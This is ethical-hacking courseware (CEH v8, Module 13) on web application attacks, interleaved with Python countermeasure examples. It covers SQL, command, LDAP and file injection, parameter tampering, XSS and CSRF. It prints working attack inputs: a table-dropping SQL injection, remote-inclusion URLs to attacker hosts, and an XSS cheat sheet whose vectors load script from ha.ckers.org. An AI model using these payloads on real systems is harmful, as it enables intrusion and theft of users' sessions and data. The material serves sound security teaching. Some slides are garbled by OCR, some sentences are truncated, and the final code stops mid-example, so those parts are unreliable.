Hacking Web Applications
Module 13
Engineered by Hackers. Presented by Professionals.
CEH
Ethical Hacking and Countermeasures v8
Module 13: Hacking Web Applications
Exam 312-50
Security News
XSS Attacks Lead Pack As Most Frequent Attack Type
and September, and offers an impression of the current internet security climate as a whole.
'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).
One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose
Module Objectives
The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators monitor and manage the web application are described. Finally, web application pen testing is discussed.
This module familiarizes you with:
Module Flow
Web App Concepts
Web App Threats
Hacking Methodology
Web Application Hacking Tools
Countermeasures
Security Tools
Web App Pen Testing
Let us begin with the Web App concepts.
Web Application Security Statistics
Source: https://www.whitehatsec.com
(Chart: share of web applications affected by each vulnerability class, including Cross-Site Scripting and Information Leakage)
According to the WhiteHat Security website statistics report in 2012, it is clear that cross-site scripting vulnerabilities are found in more web applications when compared to other vulnerabilities. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities are the most common vulnerabilities, found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.
Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency.
New web technologies such as Web 2.0 provide more attack surface for web application exploitation.
Web Application Components
Login: Most websites allow authentic users to access the application by means of a login. It means that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com
Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.
Data Access: Usually the web pages communicate with each other via a data access library in which all the database details are stored.
How Web Applications Work
(Diagram: the application sends the query SELECT * from news where id = 6329 to the database and displays the returned row as output)
ID    Topic  News
6329  Tech   CNN
Web Application Architecture
(Diagram: Clients connect over the Internet, through a Firewall and a Proxy Server / Cache, to the Presentation Layer (HTTP Request Parser, Servlet Container, Resource Handler, Authentication and Login), which calls the Business Layer (Application Server, Legacy Application, Web Services, Data Access))
Web 2.0 Applications
Web 2.0 refers to a new generation of Web applications that provide an infrastructure for more dynamic user participation, social interaction and collaboration
RSS-generated syndication
Vulnerability Stack
Custom Web Applications: Business Logic Flaws
Third Party Components: Technical Vulnerabilities (Open Source / Commercial)
Database: Oracle / MySQL / MS SQL
Web Server: Apache / Microsoft IIS
Operating System: Windows / Linux / OSX
Network: Router / Switch
Security: IPS / IDS
Web Attack Vectors
An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome.
Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting.
Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack.
XML poisoning: Attackers provide manipulated XML documents that, when processed, can disturb the logic of the parsing method on the server. When huge XMLs are processed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
Client validation: Most client-side validation has to be backed by server-side validation. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to perform SQL injection, LDAP injection, etc. and compromise the web application's key resources.
Web Application Threats - 1
(Diagram: Information Leakage, Broken Account Management, Cookie Poisoning, Improper Error Handling, Insecure Storage, Directory Traversal, Unvalidated Input)
Web application threats are not limited to attacks based on URL and port 80. Despite using ports, protocols, and the OSI layer, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack.
Web Application Threats - 2
(Diagram: Platform Exploits, Insecure Direct Object References, Insufficient Transport Layer Protection, Failure to Restrict URL Access, Insecure Cryptographic Storage, Obfuscation Application, Security Management, DMZ Protocol Attacks, Unvalidated Redirects and Forwards, Authentication Hijacking, Web Services Attacks, Session Fixation Attack, Malicious File Execution)
Platform Exploits
Various web applications are built by using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.
Insecure Direct Object References
When internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place.
Insecure Cryptographic Storage
Unvalidated Input
Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers.
An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning.
(Diagram: browser input not validated by the web application, passed through to the database)
Browser Post Request:
http://juggyboy.com/login.aspx?user=jason&pass=springfield
Modified Query:
string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'"
Parameter/Form Tampering
(Diagram: tampering with the URL parameters)
http://www.juggybank.com/cust.asp?profile=21&debit=2500
http://www.juggybank.com/cust.asp?profile=82&debt=lSO
Other parameters can be changed, including attribute parameters:
http://www.juggybank.com/stat.asp?pg=531&status=view
http://www.juggybank.com/stat.asp?pg=147&status=delete
Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.
Directory Traversal
Security Misconfiguration
Easy Exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.
Common Prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.
Example: The application server admin console is automatically installed and not removed. Default accounts are not changed. The attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over.
Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders don't make use of them for malicious attacks. All the application-based files have to be taken care of through proper authentication and strong security methods, or crucial information can be leaked to the attackers.
Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query
Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access
Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers
(Diagram: the crafted input reaches the SQL Server)
Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
SQL injection
Command injection
SQL Injection Attacks
SQL injection attacks use a series of malicious SQL queries to directly manipulate the database
An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data
SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches
(Diagram: Web Browser -> Internet -> web server running the code below; the attacker submits the inputs shown after it)
<?php
function save_email($user, $message)
{
    $sql = "INSERT INTO Messages (
        user, message
    ) VALUES (
        '$user', '$message'
    )";
    return mysql_query($sql);
}
?>
Attacker input: test'); DROP TABLE Messages; --
When this code is sent to the database server, it drops the Messages table
Attacker input: test'), ('user2', 'I am Jason'), ('user3', 'You are hacked
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection
SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.
The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,
select * from tablename where UserID = 2302
becomes the following with a simple SQL injection attack:
SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:
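The "OR 1=1" case above, shown in working code as an added example (not from the courseware). It uses Python's built-in sqlite3 module and a constructed three-row table standing in for the page's tablename; the flawed lookup splices the client value into the statement text as the page describes, and the countermeasure binds the value as a parameter after checking that it is an integer, so the same input can no longer widen the WHERE clause.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the page's "tablename".
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tablename (UserID INTEGER, name TEXT)")
    conn.executemany("INSERT INTO tablename VALUES (?, ?)",
                     [(2302, "jason"), (2303, "shaun"), (2304, "mark")])
    return conn


def lookup_vulnerable(conn, user_id):
    # The page's pattern: the parameter is pasted into the statement text,
    # so whatever the client typed is interpreted as SQL.
    sql = "SELECT * FROM tablename WHERE UserID = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    # Countermeasure: the statement text is fixed and the value travels
    # separately as a bound parameter, so it is only ever compared as data.
    try:
        uid = int(user_id)
    except ValueError:
        return []   # reject non-integer input before it reaches the database
    return conn.execute("SELECT * FROM tablename WHERE UserID = ?", (uid,)).fetchall()


def demo():
    # Row counts for the normal value and for the page's injected value.
    conn = make_db()
    normal = "2302"
    injected = "2302 OR 1=1"
    return {
        "vulnerable_normal": len(lookup_vulnerable(conn, normal)),
        "vulnerable_injected": len(lookup_vulnerable(conn, injected)),
        "safe_normal": len(lookup_parameterized(conn, normal)),
        "safe_injected": len(lookup_parameterized(conn, injected)),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable lookup returns one row for the normal value and every row for the injected one, which is exactly the enumeration the text describes; the parameterized lookup returns one row and none respectively. Type-checking the value is a second, independent layer: even without it, the bound parameter would be compared as the string '2302 OR 1=1' and match nothing.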
Command Injection Attacks
An attacker tries to craft an input string to gain shell access to a web server
Shell Injection functions include system(), startProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs
In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting
http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Shell Injection
To complete various functionalities, web applications use various applications and programs. It is just like sending an email by using the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous
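The sendmail case in working code, as an added example that is not part of the courseware. It contrasts the shell-string pattern the text warns about with an argv-list call that never passes through a shell, and adds an allowlist check on the address. The sendmail path is an assumption; the round-trip helper runs the Python interpreter in place of sendmail so the demonstration works offline.

```python
import re
import subprocess
import sys

# Assumed location of the mail transfer agent binary.
SENDMAIL = "/usr/sbin/sendmail"

# Allowlist for what an address may look like; anything else is rejected.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def sendmail_command_vulnerable(address):
    # The page's pattern: the address is pasted into a command line that a
    # function such as system() hands to the shell, so shell metacharacters
    # in the address are interpreted as shell syntax.
    return SENDMAIL + " " + address


def sendmail_argv_safe(address):
    # Countermeasure 1: validate the input against what an address can be.
    if not ADDRESS_RE.match(address):
        raise ValueError("rejected address: %r" % address)
    # Countermeasure 2: build an argument vector and run it without a shell;
    # each element reaches the program as one literal argument.
    return [SENDMAIL, address]


def argv_roundtrip(arg):
    # Shows that an argv element is delivered verbatim even when it contains
    # shell metacharacters. The child is Python itself, standing in for
    # sendmail, and simply echoes its first argument back.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", arg],
        capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    print(sendmail_command_vulnerable("addi@juggyboy.com; id"))
    print(sendmail_argv_safe("addi@juggyboy.com"))
    print(argv_roundtrip("addi@juggyboy.com; id"))
```

The two countermeasures are independent: the argv list alone stops the shell from ever seeing the input, and the allowlist alone stops an address-shaped value from carrying anything but an address; a program run with either still needs the other in case the called program interprets its own arguments.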
Command Injection Example
(Diagram: a juggyboy.com profile form with the fields User Name: C Addison, Email Address: addi@juggyboy.co, Site URL: www.juggyboy.com, Banner URL: ...gif||newpassword|1036|60|468. An attacker enters malicious code (account number) with a new password in the Banner URL field)
Malicious code: www.juggyboy.com/banner.gif|newpassword||1036|60|468
File Injection Attack
Client code running in a browser:
<form method="get">
    <select name="DRINK">
        <option value="pepsi">pepsi</option>
        <option value="coke">coke</option>
    </select>
    <input type="submit">
</form>
Vulnerable PHP code:
<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];
require($drink . '.php');
?>
Attacker: http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
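How the require($drink . '.php') pattern is hardened, as an added example in Python rather than the page's PHP (not the courseware's code). The include directory and the allowlist of page names are assumptions; the attacker value is the one from the page's URL. The same rule doubles as a detection check over request logs.

```python
import posixpath

# Assumed: the directory holding the per-drink pages, and the only names
# the form can legitimately submit.
INCLUDE_DIR = "/var/www/orders/drinks"
ALLOWED_INCLUDES = {"pepsi", "coke"}

ATTACK_VALUE = "http://jasoneval.com/exploit?"   # from the page's attacker URL


def resolve_include_vulnerable(drink):
    # The page's pattern: the query-string value is appended to '.php' and
    # handed to the include mechanism, so a URL or path becomes the target.
    return drink + ".php"


def resolve_include_safe(drink):
    # Countermeasure: the parameter may only select from a fixed set of
    # names; URLs, traversal sequences and absolute paths never match.
    if drink not in ALLOWED_INCLUDES:
        raise ValueError("unsupported DRINK value: %r" % drink)
    path = posixpath.normpath(posixpath.join(INCLUDE_DIR, drink + ".php"))
    # Second layer: the resolved path must still lie inside INCLUDE_DIR.
    if posixpath.commonpath([INCLUDE_DIR, path]) != INCLUDE_DIR:
        raise ValueError("include escapes the allowed directory")
    return path


def is_suspicious_drink_param(value):
    # Detection rule: a DRINK parameter carrying a URL scheme, a path
    # separator or a traversal sequence cannot have come from the form.
    v = value.lower()
    return "://" in v or "/" in v or "\\" in v or ".." in v


if __name__ == "__main__":
    print(resolve_include_vulnerable(ATTACK_VALUE))
    print(resolve_include_safe("coke"))
    print(is_suspicious_drink_param(ATTACK_VALUE))
```

The allowlist is the control that matters; the commonpath check only guards against a future edit that relaxes the allowlist, and the log rule flags the probing that precedes a successful inclusion.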
What Is LDAP Injection?
An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree
LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries.
LDAP is based on the
Filter Syntax: (attributeName operator value)
Operator   Example
=          (objectclass=user)
>=         (mdbStorageQuota>=100000)
<=         (mdbStorageQuota<=100000)
~=         (displayName~=Foeckeler)
*          (displayName=*John*)
NOT (!)    (!objectClass=group)
How LDAP Injection Works
(Diagram: the Client sends a Normal Query to the LDAP Server and receives the Normal Result; the Client sends a Normal Query + Code Injection and receives the Normal Result and/or Additional Information)
LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate LDAP queries
LDAP injection attacks are commonly used on web applications. LDAP injection applies to any application that has some kind of user input used to generate LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques.
Login Bypass
Information Disclosure
Privilege Escalation
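The countermeasure for the filter-building flaw described above, as an added example (not the courseware's code): user values are escaped with the RFC 4515 rules before they are placed in a filter, so the metacharacters from the operator table stay data. The filter template, attribute names and the sample input are constructed for the illustration.

```python
# RFC 4515 section 3: characters with meaning inside a search filter are
# replaced by a backslash and their two-digit hexadecimal code.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\0": r"\00",
}


def escape_filter_value(value):
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


# Assumed login filter template; three parentheses pairs when built correctly.
LOGIN_TEMPLATE = "(&(uid=%s)(userPassword=%s))"
LOGIN_TEMPLATE_PARENS = 3


def login_filter_vulnerable(username, password):
    # The flaw the page describes: raw input concatenated into the filter.
    return LOGIN_TEMPLATE % (username, password)


def login_filter_safe(username, password):
    return LOGIN_TEMPLATE % (escape_filter_value(username),
                             escape_filter_value(password))


def filter_has_injected_syntax(built_filter, expected_parens):
    # Detection check: a filter built from one fixed template has a fixed
    # number of parentheses, so any surplus means the input added syntax.
    return (built_filter.count("(") != expected_parens
            or built_filter.count(")") != expected_parens)


if __name__ == "__main__":
    sample = "jason*)"   # constructed input containing two filter metacharacters
    print(login_filter_vulnerable(sample, "pw"))
    print(login_filter_safe(sample, "pw"))
```

With the sample input the unescaped filter gains an extra closing parenthesis and a wildcard, which is how the "additional information" in the diagram comes about; the escaped filter keeps exactly the template's structure, and the parenthesis count makes a cheap assertion to place in front of the directory call.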
Hidden Field Manipulation Attack
HTML Code:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
Normal Request:
http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00
Attack Request:
http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
Hidden field manipulation attacks are mostly used against e-commerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). At the time of development of such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the price of the product and complete a transaction with the price that he or she has altered, rather than the actual price of the product.
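The server-side countermeasure for both the hidden PRICE field above and the juggybank profile/status parameters from the Parameter/Form Tampering slide, as an added example (not the courseware's code). The catalog, the profile ownership table and the form dictionaries are constructed; the attack form carries the page's price=2.00 value.

```python
from decimal import Decimal

# Constructed server-side data: the only authoritative source of prices and
# of who owns which profile.
CATALOG = {"Juggyboy Shirt": Decimal("200.00")}
PROFILE_OWNERS = {21: "alice", 82: "bob"}

NORMAL_FORM = {"product": "Juggyboy Shirt", "price": "200.00"}
ATTACK_FORM = {"product": "Juggyboy Shirt", "price": "2.00"}   # page's attack request


def total_trusting_client(form):
    # The page's flaw: the hidden PRICE field is taken at face value.
    return Decimal(form["price"]) * int(form.get("qty", 1))


def total_server_side(form):
    # Countermeasure: price is looked up by product on the server; the
    # submitted price is ignored and an unknown product is rejected.
    product = form["product"]
    if product not in CATALOG:
        raise ValueError("unknown product: %r" % product)
    qty = int(form.get("qty", 1))
    if qty < 1:
        raise ValueError("quantity must be positive")
    return CATALOG[product] * qty


def detect_price_tamper(form):
    # Detection hook: a legitimate browser only echoes the hidden value, so a
    # submitted price that disagrees with the catalog is worth logging.
    product = form["product"]
    return product in CATALOG and Decimal(form["price"]) != CATALOG[product]


def load_profile(session_user, requested_profile):
    # For cust.asp?profile=N and stat.asp?status=delete: the object named in
    # the query string must belong to the authenticated session, regardless
    # of what the client chose to send.
    if PROFILE_OWNERS.get(requested_profile) != session_user:
        raise PermissionError("profile %d is not owned by %s"
                              % (requested_profile, session_user))
    return requested_profile


if __name__ == "__main__":
    print(total_trusting_client(ATTACK_FORM), total_server_side(ATTACK_FORM))
    print(detect_price_tamper(ATTACK_FORM), load_profile("alice", 21))
```

The principle both functions apply is that a hidden field or URL parameter is just client input: it can name what the user wants, but the server decides the price and checks the authorization itself.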
Cross-Site Scripting (XSS) Attacks
It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering
Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses web applications to send malicious JavaScript code to different end users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions. An attacker often uses different methods to encode the malicious portion (Unicode) of the tag, so that a request seems genuine to the user. Some of them are:
How XSS Attacks Work
(Diagram: this example uses a vulnerable page which handles requests for a nonexistent page, a classic 404 error page)
Normal Request:
http://juggyboy.com/jason_file.html
Server Code (handles requests for a nonexistent page, a classic 404 error page):
<html>
<body>
<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
</body>
</html>
Server Response: the 404 page produced by the code above, echoing the requested URI
XSS Attack Code: the attacker sends an email with a malicious link ("Hi, You have won a lottery of $2M, click the link to claim it. <A HREF=http://juggyboy.com/...."); the user clicks the malicious link; the server sends a page to the user with the client profile (Name: Shaun, Age: 31, Location: UK, Occupation: SE, Last visit: Sept 21, 2010); the malicious code is executed on the client web browser.
In this example, the attacker crafts an email message with a malicious script and sends it to the victim:
<A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
In a cross-site scripting attack via email, the attacker crafts an email that contains a link to a malicious script and sends it to the victim.
Malicious Script:
<A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
The following diagram depicts the cross-site scripting attack scenario via email:
XSS Example: Attack via Email
(Diagram: participants are the User's Browser, the Malicious Script, the Attacker's Server and the Legitimate Server. 1. The attacker constructs a link such as <A HREF=http://juggyboybank.com/..., sends the URL to the user and convinces the user to click on it. 2. The browser requests the page. 3. The page with the malicious script is returned. 4. The script runs.)
XSS Example: Stealing Users' Cookies
(Diagram: the user views the page hosted by the attacker; HTML containing the malicious script is returned; the script runs; the attacker collects the user's cookies)
To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then installs a cookie stealer (cookie logger).
The following are the various steps involved in stealing a user's cookies with the help of an XSS attack:
XSS Example: Sending an Unauthorized Request
(Diagram: participants are the User's Browser, the Malicious Script, the Attacker's Server and the Legitimate Server; the script runs and sends an unauthorized request)
Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request:
4. The attacker's server, in response to the user's request, sends the page with the malicious script
XSS Attack in Blog Posting
(Diagram: the attacker adds a malicious script in the comment field of a blog post; the comment with the malicious link is stored on the server (Web Application); the user is redirected to a malicious website, juggyboy.com)
Malicious code:
<script>onload=window.location='http://www.juggyboy.com'</script>
is injected into the blog post
X S S A t t a c k in C o m m e n t F ie ld C E H
oooo
U s e r v is it s th e
I Tech Post
w e b s it e Face book acquires file-sharing service
New York-based start-up that lets users privately
and sporadicaty share fles through a drag-and-
drop interface with additional options----------
C om m ent
Jason, I love your blog post!
- Mark (mark@miccasoft.com)
Leave y o u r c o m m en t
M alicious code
< s c r ip t » a le r t ( " H e ll
o Wor I d ") < / sc r ip t>
is in je ctin g th e blog post
H I
ן H^lnVWnild
C o m m e n t w it h T h e a le r t p o p s u p as s o o n
m a lic io u s lin k is a s t h e w e b p a g e is lo a d e d I <*......i
s to r e d o n th e s e r v e r
D a ta b a s e S e rv e r W e b A p p lic a t io n P o p u p W in d o w
J X S S A tta c k in a C o m m e n t F ie ld
■ ....
Many web applications build their HTML pages dynamically from data that arrives from different sources, so the contents of a page change with each request. If the comments feature writes user-supplied text into the page without encoding it, an attacker can submit a comment that contains HTML tags and a malicious script. Every target who views the comment has the script executed in his or her own browser, in the security context of the site, where it can read cookies, issue requests, or redirect the user. Because the payload is stored on the server and served to each visitor, this variant is known as stored (persistent) XSS.
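The difference between the vulnerable comment feature and a fixed one comes down to one call at output time. The following is an added example, not code from the module: a minimal renderer that stores the payloads from the slides above as comments and emits the page two ways, concatenated raw (the vulnerable pattern) and HTML-encoded with `html.escape` (the fix). The comments and the page template are constructed for the example.

```python
import html

# Constructed sample comments as the blog's comment feature would store them.
# The second and third are the payloads shown on the slides above.
STORED_COMMENTS = [
    "Jason, I love your blog post! - Mark",
    '<script>alert("Hello World")</script>',
    "<script>onload=window.location='http://www.juggyboy.com'</script>",
]


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable pattern: the stored comment is concatenated into the page as-is,
    so any tags inside it become live markup in every visitor's browser."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Fixed pattern: HTML-encode the comment for the HTML-body context, so
    '<' becomes '&lt;' and the browser shows the payload as text."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_page(comments, safe: bool) -> str:
    """Assemble the post page; `safe` selects which renderer the comment list uses."""
    renderer = render_comment_safe if safe else render_comment_vulnerable
    body = "\n".join(renderer(c) for c in comments)
    return f"<html><body><h1>Tech Post</h1>\n{body}\n</body></html>"


def has_live_script(page: str) -> bool:
    """Does the rendered page still contain an un-encoded <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_page(STORED_COMMENTS, safe=False))  # payloads execute on load
    print(render_page(STORED_COMMENTS, safe=True))   # payloads display as text
```

`html.escape` is correct only for text placed in the HTML body. Data written into an attribute value, a JavaScript string, a URL, or a CSS value needs the encoding for that context, and a comment that is later reflected into a `javascript:` link or an event handler is not protected by this one call.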
XSS Cheat Sheet

Normal XSS JavaScript injection:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Image XSS:
<IMG SRC="javascript:alert('XSS');">

No quotes and no semicolon:
<IMG SRC=javascript:alert('XSS')>

Case insensitive XSS attack vector:
<IMG SRC=JaVaScRiPt:alert('XSS')>

Embedded tab:
<IMG SRC="jav	ascript:alert('XSS');">

Embedded encoded tab:
<IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded carriage return:
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null chars:
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

Non-alpha-non-digit XSS:
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Non-alpha-non-digit part 2 XSS:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

Extraneous open brackets:
<<SCRIPT>alert("XSS");//<</SCRIPT>

Double open angle brackets:
<iframe src=http://ha.ckers.org/scriptlet.html <

XSS with no single quotes or double quotes or semicolons:
<SCRIPT>alert(/XSS/.source)</SCRIPT>

US-ASCII encoding:
¼script¾alert(¢XSS¢)¼/script¾

IMG lowsrc:
<IMG LOWSRC="javascript:alert('XSS')">

IMG DYNSRC:
<IMG DYNSRC="javascript:alert('XSS')">

BGSOUND:
<BGSOUND SRC="javascript:alert('XSS');">

LAYER:
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

Mocha:
<IMG SRC="livescript:[code]">

XSS locator:
'';!--"<XSS>=&{()}

Note: several of these vectors (javascript: and livescript: URLs in IMG SRC, LOWSRC, DYNSRC, BGSOUND, LAYER) rely on legacy browser behaviour and do not execute in current browsers. They remain useful for probing what a filter lets through; proving impact needs a vector the target's browsers actually honour.
Cross-Site Request Forgery (CSRF) Attack

[Figure: CSRF attack. Participants: User, Trusted Website, Malicious Website.
1. The user logs in to the trusted website, which stores the session identifier for the session in a cookie in the web browser.
2. The user visits the malicious website, which causes a request to be sent to the trusted website from the user's browser using his session cookie.]

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Cross-site Request Forgery (CSRF) Attack

How CSRF Attacks Work

In a cross-site request forgery attack, the attacker waits for the user to authenticate to the trusted server and then tricks the user into opening a malicious page or link. That page contains markup (for example a hidden auto-submitting form or an image tag) that makes the user's browser send a request to the trusted server. Because the browser automatically attaches the user's session cookie, the trusted server processes the forged request as if the user had made it deliberately: no attacker code runs on the server, but a state-changing action (a funds transfer, a password change, a purchase) is performed with the victim's privileges. The following diagram explains the step-by-step process of a CSRF attack:
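The standard defence is to require, on every state-changing request, a secret that the browser does not attach automatically. The following is an added example written for this module, not code from it: a per-session anti-CSRF token minted at login, embedded by the trusted site in its own form, and checked in constant time by the server-side handler. The session store, the `/transfer` endpoint and the form field names are assumptions made for the example.

```python
import hmac
import secrets

# Constructed in-memory session store: session cookie value -> session data.
SESSIONS = {}


def create_session(username: str) -> str:
    """Log a user in: mint an unguessable session id and a per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid: str) -> str:
    """The trusted site embeds the session's CSRF token as a hidden field.
    Only a page served by the trusted origin can read this value; a page on
    the malicious site cannot, so it cannot build a form that passes the check."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer(cookies: dict, form: dict):
    """Server-side handler for POST /transfer. Returns (status, message).

    The browser attaches the session cookie to every request to this site,
    including ones a malicious page triggered, so the cookie alone says nothing
    about who built the request. The CSRF token does.
    """
    session = SESSIONS.get(cookies.get("sessionid", ""))
    if session is None:
        return 401, "not logged in"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so timing does not leak the token byte by byte.
    if not hmac.compare_digest(session["csrf_token"].encode(), supplied.encode()):
        return 403, "csrf token missing or invalid"
    return 200, f"{session['user']} transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = create_session("alice")
    cookies = {"sessionid": sid}  # what the browser sends automatically
    # Forged request from the malicious site: has the cookie, lacks the token.
    print(handle_transfer(cookies, {"to": "attacker", "amount": "1000"}))
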